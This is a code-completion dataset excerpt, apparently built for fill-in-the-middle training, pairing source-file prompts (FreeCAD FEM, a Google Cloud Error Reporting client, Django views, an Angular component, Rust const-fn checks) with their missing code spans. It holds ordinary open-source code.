prompt (large_string, lengths 70–991k) | completion (large_string, lengths 0–1.02k) |
---|---|
<|file_name|>constraint_electrostaticpotential.py<|end_file_name|><|fim▁begin|># ***************************************************************************
# * Copyright (c) 2017 Markus Hovorka <m.hovorka@live.de> *
# * Copyright (c) 2020 Bernd Hahnebach <bernd@bimstatik.org> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "FreeCAD FEM constraint electrostatic potential document object"
__author__ = "Markus Hovorka, Bernd Hahnebach"
__url__ = "https://www.freecadweb.org"
## @package constraint_electrostaticpotential
# \ingroup FEM
# \brief constraint electrostatic potential object
from . import base_fempythonobject
class ConstraintElectrostaticPotential(base_fempythonobject.BaseFemPythonObject):
Type = "Fem::ConstraintElectrostaticPotential"
def __init__(self, obj):
super(ConstraintElectrostaticPotential, self).__init__(obj)
self.add_properties(obj)
def onDocumentRestored(self, obj):
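        # re-add properties so documents saved by older versions pick up newly introduced ones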
self.add_properties(obj)
def add_properties(self, obj):
if not hasattr(obj, "Potential"):
obj.addProperty(
"App::PropertyFloat",
"Potential",
"Parameter",
"Potential"
            )
obj.Potential = 0.0
if not hasattr(obj, "PotentialEnabled"):
obj.addProperty(
"App::PropertyBool",
"PotentialEnabled",
"Parameter",
"Potential Enabled"
            )
obj.PotentialEnabled = False
if not hasattr(obj, "PotentialConstant"):
obj.addProperty(
"App::PropertyBool",
"PotentialConstant",
"Parameter",
"Potential Constant"
            )
obj.PotentialConstant = False
if not hasattr(obj, "ElectricInfinity"):
obj.addProperty(
"App::PropertyBool",
"ElectricInfinity",
"Parameter",
"Electric Infinity"
            )
obj.ElectricInfinity = False
if not hasattr(obj, "ElectricForcecalculation"):<|fim▁hole|> "Electric Force Calculation"
            )
obj.ElectricForcecalculation = False
if not hasattr(obj, "CapacitanceBody"):
obj.addProperty(
"App::PropertyInteger",
"CapacitanceBody",
"Parameter",
"Capacitance Body"
            )
obj.CapacitanceBody = 0
if not hasattr(obj, "CapacitanceBodyEnabled"):
obj.addProperty(
"App::PropertyBool",
"CapacitanceBodyEnabled",
"Parameter",
"Capacitance Body Enabled"
)
obj.CapacitanceBodyEnabled = False<|fim▁end|>
|
obj.addProperty(
"App::PropertyBool",
"ElectricForcecalculation",
"Parameter",
|
<|file_name|>client.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
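# older google-api-core releases may not define gapic_v1.method._MethodDefault,
# so fall back to a broader type in that case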
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.errorreporting_v1beta1.types import report_errors_service
from .transports.base import ReportErrorsServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import ReportErrorsServiceGrpcTransport
from .transports.grpc_asyncio import ReportErrorsServiceGrpcAsyncIOTransport
<|fim▁hole|> """Metaclass for the ReportErrorsService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[ReportErrorsServiceTransport]]
_transport_registry["grpc"] = ReportErrorsServiceGrpcTransport
_transport_registry["grpc_asyncio"] = ReportErrorsServiceGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[ReportErrorsServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class ReportErrorsServiceClient(metaclass=ReportErrorsServiceClientMeta):
"""An API for reporting error events."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "clouderrorreporting.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ReportErrorsServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ReportErrorsServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> ReportErrorsServiceTransport:
"""Returns the transport used by the client instance.
Returns:
ReportErrorsServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
        (1) if `client_options.api_endpoint` is provided, use the provided one.
        (2) if the `GOOGLE_API_USE_MTLS_ENDPOINT` environment variable is "always", use the
        default mTLS endpoint; if the environment variable is "never", use the default API
        endpoint; otherwise, if a client cert source exists, use the default mTLS endpoint;
        otherwise use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, ReportErrorsServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the report errors service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ReportErrorsServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, ReportErrorsServiceTransport):
# transport is a ReportErrorsServiceTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def report_error_event(
self,
request: Union[report_errors_service.ReportErrorEventRequest, dict] = None,
*,
project_name: str = None,
event: report_errors_service.ReportedErrorEvent = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> report_errors_service.ReportErrorEventResponse:
r"""Report an individual error event and record the event to a log.
This endpoint accepts **either** an OAuth token, **or** an `API
key <https://support.google.com/cloud/answer/6158862>`__ for
authentication. To use an API key, append it to the URL as the
value of a ``key`` parameter. For example:
``POST https://clouderrorreporting.googleapis.com/v1beta1/{projectName}/events:report?key=123ABC456``
**Note:** `Error Reporting </error-reporting>`__ is a global
service built on Cloud Logging and doesn't analyze logs stored
in regional log buckets or logs routed to other Google Cloud
projects.
For more information, see `Using Error Reporting with
regionalized logs </error-reporting/docs/regionalization>`__.
.. code-block:: python
from google.cloud import errorreporting_v1beta1
def sample_report_error_event():
# Create a client
client = errorreporting_v1beta1.ReportErrorsServiceClient()
# Initialize request argument(s)
event = errorreporting_v1beta1.ReportedErrorEvent()
event.message = "message_value"
request = errorreporting_v1beta1.ReportErrorEventRequest(
project_name="project_name_value",
event=event,
)
# Make the request
response = client.report_error_event(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.errorreporting_v1beta1.types.ReportErrorEventRequest, dict]):
The request object. A request for reporting an
individual error event.
project_name (str):
Required. The resource name of the Google Cloud Platform
project. Written as ``projects/{projectId}``, where
``{projectId}`` is the `Google Cloud Platform project
ID <https://support.google.com/cloud/answer/6158840>`__.
                Example: ``projects/my-project-123``.
This corresponds to the ``project_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
event (google.cloud.errorreporting_v1beta1.types.ReportedErrorEvent):
Required. The error event to be
reported.
This corresponds to the ``event`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.errorreporting_v1beta1.types.ReportErrorEventResponse:
Response for reporting an individual
error event. Data may be added to this
message in the future.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_name, event])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a report_errors_service.ReportErrorEventRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, report_errors_service.ReportErrorEventRequest):
request = report_errors_service.ReportErrorEventRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_name is not None:
request.project_name = project_name
if event is not None:
request.event = event
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.report_error_event]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("project_name", request.project_name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-errorreporting",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("ReportErrorsServiceClient",)<|fim▁end|>
|
class ReportErrorsServiceClientMeta(type):
|
<|file_name|>subscribers.py<|end_file_name|><|fim▁begin|>from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.utils.translation import ugettext as _
from apps.mainapp.models import Report, ReportSubscriber
from apps.mainapp.forms import ReportSubscriberForm
def new( request, report_id ):
report = get_object_or_404(Report, id=report_id)
error_msg = None
if request.method == 'POST':
form = ReportSubscriberForm( request.POST )
if form.is_valid():
subscriber = form.save( commit = False )
            subscriber.report = report
if report.is_subscribed(subscriber.email):
error_msg = _("You are already subscribed to this report.")
else:
subscriber.save()
return( HttpResponseRedirect( '/reports/subscribers/create/' ) )
else:
form = ReportSubscriberForm()
return render_to_response("reports/subscribers/new.html",
{ "subscriber_form": form,
"report": report,
"error_msg": error_msg, },
context_instance=RequestContext(request))
def create( request ):
return render_to_response("reports/subscribers/create.html",
{ },
context_instance=RequestContext(request))
def confirm( request, confirm_token ):<|fim▁hole|> return render_to_response("reports/subscribers/confirm.html",
{ "subscriber": subscriber, },
context_instance=RequestContext(request))
def unsubscribe(request, confirm_token ):
subscriber = get_object_or_404(ReportSubscriber, confirm_token = confirm_token )
report = subscriber.report
subscriber.delete()
return render_to_response("reports/subscribers/message.html",
{ "message": _("You have unsubscribed from updates to:") + report.title, },
context_instance=RequestContext(request))<|fim▁end|>
|
subscriber = get_object_or_404(ReportSubscriber, confirm_token = confirm_token )
subscriber.is_confirmed = True
subscriber.save()
|
<|file_name|>scheduler.component.ts<|end_file_name|><|fim▁begin|>import {Component} from '@angular/core';
import * as $ from "jquery"
import {downgradeComponent} from '@angular/upgrade/static';
import {NotificationService} from "../../core/services/notification.service";
import {AgentService} from "../../core/services/agent.service";
declare var angular:any
@Component({
selector: 'scheduler',
templateUrl: "./scheduler.component.html",
styleUrls: []
})
class SchedulerComponent {
constructor(private notification: NotificationService, private agentService: AgentService) {
// agent
// this.agentService.isActive().then(() => {
// this.init();
// });
}
init() {
}
<|fim▁hole|>}
angular.module('scheduler.components', []).directive(
    'scheduler',
downgradeComponent({component: SchedulerComponent}));
export {SchedulerComponent};<|fim▁end|>
| |
<|file_name|>qualify_min_const_fn.rs<|end_file_name|><|fim▁begin|>use rustc::hir::def_id::DefId;
use rustc::hir;
use rustc::mir::*;
use rustc::ty::{self, Predicate, TyCtxt};
use rustc_target::spec::abi;
use std::borrow::Cow;
use syntax_pos::Span;
type McfResult = Result<(), (Span, Cow<'static, str>)>;
pub fn is_min_const_fn(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
mir: &'a Mir<'tcx>,
) -> McfResult {
let mut current = def_id;
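    // walk `def_id` and all of its generic parents, rejecting any predicate
    // that is not allowed in a `min_const_fn`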
loop {
let predicates = tcx.predicates_of(current);
for (predicate, _) in &predicates.predicates {
match predicate {
| Predicate::RegionOutlives(_)
| Predicate::TypeOutlives(_)
| Predicate::WellFormed(_)
| Predicate::ConstEvaluatable(..) => continue,
| Predicate::ObjectSafe(_) => {
bug!("object safe predicate on function: {:#?}", predicate)
}
Predicate::ClosureKind(..) => {
bug!("closure kind predicate on function: {:#?}", predicate)
}
Predicate::Subtype(_) => bug!("subtype predicate on function: {:#?}", predicate),
Predicate::Projection(_) => {
let span = tcx.def_span(current);
// we'll hit a `Predicate::Trait` later which will report an error
tcx.sess
.delay_span_bug(span, "projection without trait bound");
continue;
}
Predicate::Trait(pred) => {
if Some(pred.def_id()) == tcx.lang_items().sized_trait() {
continue;
}
match pred.skip_binder().self_ty().sty {
ty::Param(ref p) => {
let generics = tcx.generics_of(current);
let def = generics.type_param(p, tcx);
let span = tcx.def_span(def.def_id);
return Err((
span,
"trait bounds other than `Sized` \
on const fn parameters are unstable"
.into(),
));
}
// other kinds of bounds are either tautologies
// or cause errors in other passes
_ => continue,
}
}
}
}
match predicates.parent {
Some(parent) => current = parent,
None => break,
}
}
for local in mir.vars_iter() {
return Err((
mir.local_decls[local].source_info.span,
"local variables in const fn are unstable".into(),
));
}
for local in &mir.local_decls {
check_ty(tcx, local.ty, local.source_info.span)?;
}
// impl trait is gone in MIR, so check the return type manually
check_ty(
tcx,
tcx.fn_sig(def_id).output().skip_binder(),
mir.local_decls.iter().next().unwrap().source_info.span,
)?;
for bb in mir.basic_blocks() {
check_terminator(tcx, mir, bb.terminator())?;
for stmt in &bb.statements {
check_statement(tcx, mir, stmt)?;
}
}
Ok(())
}
fn check_ty(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
ty: ty::Ty<'tcx>,
span: Span,
) -> McfResult {
for ty in ty.walk() {
match ty.sty {
ty::Ref(_, _, hir::Mutability::MutMutable) => return Err((
span,
"mutable references in const fn are unstable".into(),
)),
ty::Opaque(..) => return Err((span, "`impl Trait` in const fn is unstable".into())),
ty::FnPtr(..) => {
return Err((span, "function pointers in const fn are unstable".into()))
}
ty::Dynamic(preds, _) => {
for pred in preds.iter() {
match pred.skip_binder() {
| ty::ExistentialPredicate::AutoTrait(_)
| ty::ExistentialPredicate::Projection(_) => {
return Err((
span,
"trait bounds other than `Sized` \
on const fn parameters are unstable"
.into(),
))
}
ty::ExistentialPredicate::Trait(trait_ref) => {
if Some(trait_ref.def_id) != tcx.lang_items().sized_trait() {
return Err((
span,
"trait bounds other than `Sized` \
on const fn parameters are unstable"
.into(),
));
}
}
}
}
}
_ => {}
}
}
Ok(())
}
fn check_rvalue(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
rvalue: &Rvalue<'tcx>,
span: Span,
) -> McfResult {
match rvalue {
Rvalue::Repeat(operand, _) | Rvalue::Use(operand) => {
check_operand(tcx, mir, operand, span)
}
Rvalue::Len(place) | Rvalue::Discriminant(place) | Rvalue::Ref(_, _, place) => {
check_place(tcx, mir, place, span, PlaceMode::Read)
}
Rvalue::Cast(CastKind::Misc, operand, cast_ty) => {
use rustc::ty::cast::CastTy;
let cast_in = CastTy::from_ty(operand.ty(mir, tcx)).expect("bad input type for cast");
let cast_out = CastTy::from_ty(cast_ty).expect("bad output type for cast");
match (cast_in, cast_out) {
(CastTy::Ptr(_), CastTy::Int(_)) | (CastTy::FnPtr, CastTy::Int(_)) => Err((
span,
"casting pointers to ints is unstable in const fn".into(),
)),
(CastTy::RPtr(_), CastTy::Float) => bug!(),
(CastTy::RPtr(_), CastTy::Int(_)) => bug!(),
(CastTy::Ptr(_), CastTy::RPtr(_)) => bug!(),
_ => check_operand(tcx, mir, operand, span),
}
}
Rvalue::Cast(CastKind::UnsafeFnPointer, _, _) |
Rvalue::Cast(CastKind::ClosureFnPointer, _, _) |
Rvalue::Cast(CastKind::ReifyFnPointer, _, _) => Err((
span,
"function pointer casts are not allowed in const fn".into(),
)),
Rvalue::Cast(CastKind::Unsize, _, _) => Err((
span,
"unsizing casts are not allowed in const fn".into(),
)),
// binops are fine on integers
Rvalue::BinaryOp(_, lhs, rhs) | Rvalue::CheckedBinaryOp(_, lhs, rhs) => {
check_operand(tcx, mir, lhs, span)?;
check_operand(tcx, mir, rhs, span)?;
let ty = lhs.ty(mir, tcx);
if ty.is_integral() || ty.is_bool() || ty.is_char() {
Ok(())
} else {
Err((
span,
"only int, `bool` and `char` operations are stable in const fn".into(),
))
}
}
Rvalue::NullaryOp(NullOp::SizeOf, _) => Ok(()),
Rvalue::NullaryOp(NullOp::Box, _) => Err((
span,
"heap allocations are not allowed in const fn".into(),
)),
Rvalue::UnaryOp(_, operand) => {
let ty = operand.ty(mir, tcx);
if ty.is_integral() || ty.is_bool() {
check_operand(tcx, mir, operand, span)
} else {
Err((
span,
"only int and `bool` operations are stable in const fn".into(),
))
}
}
Rvalue::Aggregate(_, operands) => {
for operand in operands {
check_operand(tcx, mir, operand, span)?;
}
Ok(())
}
}
}
enum PlaceMode {
Assign,
Read,
}
fn check_statement(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
statement: &Statement<'tcx>,
) -> McfResult {
let span = statement.source_info.span;
match &statement.kind {
StatementKind::Assign(place, rval) => {
check_place(tcx, mir, place, span, PlaceMode::Assign)?;
check_rvalue(tcx, mir, rval, span)
}
StatementKind::FakeRead(..) => Err((span, "match in const fn is unstable".into())),
// just an assignment
StatementKind::SetDiscriminant { .. } => Ok(()),
| StatementKind::InlineAsm { .. } => {
Err((span, "cannot use inline assembly in const fn".into()))
}
// These are all NOPs
| StatementKind::StorageLive(_)
| StatementKind::StorageDead(_)
| StatementKind::Retag { .. }
| StatementKind::EscapeToRaw { .. }
| StatementKind::AscribeUserType(..)
| StatementKind::Nop => Ok(()),
}
}
fn check_operand(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
operand: &Operand<'tcx>,
span: Span,
) -> McfResult {
match operand {
Operand::Move(place) | Operand::Copy(place) => {
check_place(tcx, mir, place, span, PlaceMode::Read)
}
Operand::Constant(_) => Ok(()),
}
}
fn check_place(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
place: &Place<'tcx>,
span: Span,
mode: PlaceMode,
) -> McfResult {
match place {
Place::Local(l) => match mode {
PlaceMode::Assign => match mir.local_kind(*l) {
LocalKind::Temp | LocalKind::ReturnPointer => Ok(()),
LocalKind::Arg | LocalKind::Var => {
Err((span, "assignments in const fn are unstable".into()))
}
},
PlaceMode::Read => Ok(()),
},
// promoteds are always fine, they are essentially constants
Place::Promoted(_) => Ok(()),
Place::Static(_) => Err((span, "cannot access `static` items in const fn".into())),
Place::Projection(proj) => {
match proj.elem {
| ProjectionElem::Deref | ProjectionElem::Field(..) | ProjectionElem::Index(_) => {
check_place(tcx, mir, &proj.base, span, mode)
}
// slice patterns are unstable
| ProjectionElem::ConstantIndex { .. } | ProjectionElem::Subslice { .. } => {
return Err((span, "slice patterns in const fn are unstable".into()))
}
| ProjectionElem::Downcast(..) => {
Err((span, "`match` or `if let` in `const fn` is unstable".into()))
}
}
}
}
}
fn check_terminator(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
terminator: &Terminator<'tcx>,
) -> McfResult {
let span = terminator.source_info.span;
match &terminator.kind {
| TerminatorKind::Goto { .. }
| TerminatorKind::Return
| TerminatorKind::Resume => Ok(()),
TerminatorKind::Drop { location, .. } => {
check_place(tcx, mir, location, span, PlaceMode::Read)
}
TerminatorKind::DropAndReplace { location, value, .. } => {
check_place(tcx, mir, location, span, PlaceMode::Read)?;
check_operand(tcx, mir, value, span)
},
TerminatorKind::FalseEdges { .. } | TerminatorKind::SwitchInt { .. } => Err((
span,
"`if`, `match`, `&&` and `||` are not stable in const fn".into(),
)),
| TerminatorKind::Abort | TerminatorKind::Unreachable => {
Err((span, "const fn with unreachable code is not stable".into()))
}
| TerminatorKind::GeneratorDrop | TerminatorKind::Yield { .. } => {
Err((span, "const fn generators are unstable".into()))
}<|fim▁hole|> TerminatorKind::Call {
func,
args,
from_hir_call: _,
destination: _,
cleanup: _,
} => {
let fn_ty = func.ty(mir, tcx);
if let ty::FnDef(def_id, _) = fn_ty.sty {
// some intrinsics are waved through if called inside the
// standard library. Users never need to call them directly
match tcx.fn_sig(def_id).abi() {
abi::Abi::RustIntrinsic => match &tcx.item_name(def_id).as_str()[..] {
| "size_of"
| "min_align_of"
| "needs_drop"
=> {},
_ => return Err((
span,
"can only call a curated list of intrinsics in `min_const_fn`".into(),
)),
},
abi::Abi::Rust if tcx.is_min_const_fn(def_id) => {},
abi::Abi::Rust => return Err((
span,
"can only call other `min_const_fn` within a `min_const_fn`".into(),
)),
abi => return Err((
span,
format!(
"cannot call functions with `{}` abi in `min_const_fn`",
abi,
).into(),
)),
}
check_operand(tcx, mir, func, span)?;
for arg in args {
check_operand(tcx, mir, arg, span)?;
}
Ok(())
} else {
Err((span, "can only call other const fns within const fn".into()))
}
}
TerminatorKind::Assert {
cond,
expected: _,
msg: _,
target: _,
cleanup: _,
} => check_operand(tcx, mir, cond, span),
TerminatorKind::FalseUnwind { .. } => {
Err((span, "loops are not allowed in const fn".into()))
},
}
}<|fim▁end|>
| |
<|file_name|>building_location_choice_model.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
